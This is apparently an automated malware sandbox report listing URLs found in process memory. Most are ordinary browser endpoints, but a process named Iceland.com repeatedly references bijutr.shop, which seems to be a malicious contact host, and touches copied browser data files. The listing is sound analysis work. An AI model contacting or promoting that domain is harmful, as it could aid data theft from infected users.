Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000018.00000002.2721597902.000054DC000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000018.00000002.2721597902.000054DC000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000018.00000002.2721597902.000054DC000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000018.00000002.2721453013.000054DC0008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: powershell.exe, 00000003.00000002.2106520526.000001A500001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2106520526.000001A500229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.2106520526.000001A50162F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msedge.exe, 0000001C.00000002.2792665828.00000251FFD55000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000020.00000002.2897367158.000002D34BB43000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000024.00000002.3049144760.00000216798FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: Iceland.com, 00000015.00000002.3341880599.000000000433D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop
Source: Iceland.com, 00000015.00000002.3337432353.0000000004085000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/
Source: Iceland.com, 00000015.00000002.3334428313.000000000166F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/B_F
Source: Iceland.com, 00000015.00000002.3338270590.00000000040D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/URR
Source: Iceland.com, 00000015.00000002.3338270590.00000000040D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/Usei
Source: Iceland.com, 00000015.00000002.3334799406.00000000016E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/V
Source: Iceland.com, 00000015.00000002.3338270590.00000000040D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/ngs
Source: Iceland.com, 00000015.00000002.3338270590.00000000040D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/ns
Source: Iceland.com, 00000015.00000002.3338270590.00000000040D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/ocaC
Source: Iceland.com, 00000015.00000002.3341880599.00000000043CD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop37Y5F3
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop5FCJE3
Source: Iceland.com, 00000015.00000002.3341880599.00000000043CD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopG4W47G4
Source: Iceland.com, 00000015.00000002.3341880599.00000000043CD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopUVWXYZ1234567890oin
Source: Iceland.com, 00000015.00000002.3341880599.00000000043CD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopata
Source: Iceland.com, 00000015.00000002.3341880599.00000000043CD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopbf8eaf1819b7
Source: Iceland.com, 00000015.00000002.3341880599.000000000436C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shopsh;
Source: Iceland.com, 00000015.00000002.3338270590.0000000004097000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3338924888.0000000004205000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Iceland.com, 00000015.00000002.3338270590.0000000004097000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3338924888.0000000004205000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723167042.000054DC00544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000018.00000002.2728509553.000054DC00C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000018.00000002.2723515837.000054DC00650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000018.00000002.2723515837.000054DC00650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: Iceland.com, 00000015.00000002.3338924888.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr, Web Data.37.dr, GVS0HV.21.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: Iceland.com, 00000015.00000002.3338924888.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722915743.000054DC0046C000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr, Web Data.37.dr, GVS0HV.21.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msedge.exe, 00000024.00000002.3053281126.00005E340016C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000018.00000002.2723581690.000054DC00670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000018.00000002.2726269890.000054DC00A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723581690.000054DC00670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2731827074.000054DC00FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732993095.000054DC01144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2726026574.000054DC00A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000018.00000002.2731827074.000054DC00FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en3
Source: chrome.exe, 00000018.00000003.2643017611.000054DC00F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639881206.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2647664274.000054DC00D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644291367.000054DC00D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2641815690.000054DC00F10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000018.00000003.2675385760.000054DC027B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000018.00000002.2721957410.000054DC00194000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2795903347.00003D1802220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000002.2899806093.0000469C0017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000002.3053281126.00005E340016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.37.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: msedge.exe, 00000020.00000002.2899806093.0000469C0017C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/https://chrome.google.com/webstoreF
Source: chrome.exe, 00000018.00000002.2729032193.000054DC00CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000018.00000002.2729032193.000054DC00CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/T
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000018.00000003.2625701191.00006050002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2625717661.00006050002EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000018.00000002.2724316387.000054DC00760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723581690.000054DC00670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723677359.000054DC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2713680798.0000000118BFC000.00000004.00000010.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723195719.000054DC0055C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2795939713.00003D1802240000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000002.2899096675.0000469C00040000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000002.3052400606.00005E3400040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000018.00000002.2723195719.000054DC0055C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxT
Source: chrome.exe, 00000018.00000002.2725233523.000054DC00960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000018.00000002.2725233523.000054DC00960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bT
Source: chrome.exe, 00000018.00000002.2725233523.000054DC00960000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000018.00000002.2723581690.000054DC00670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: Iceland.com, 00000015.00000002.3338270590.0000000004097000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3338924888.0000000004205000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Iceland.com, 00000015.00000002.3338270590.0000000004097000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3338924888.0000000004205000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000003.00000002.2123581484.000001A510071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
